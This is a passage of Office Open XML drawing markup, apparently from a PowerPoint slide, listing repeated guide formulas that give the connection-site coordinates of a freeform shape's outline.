              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
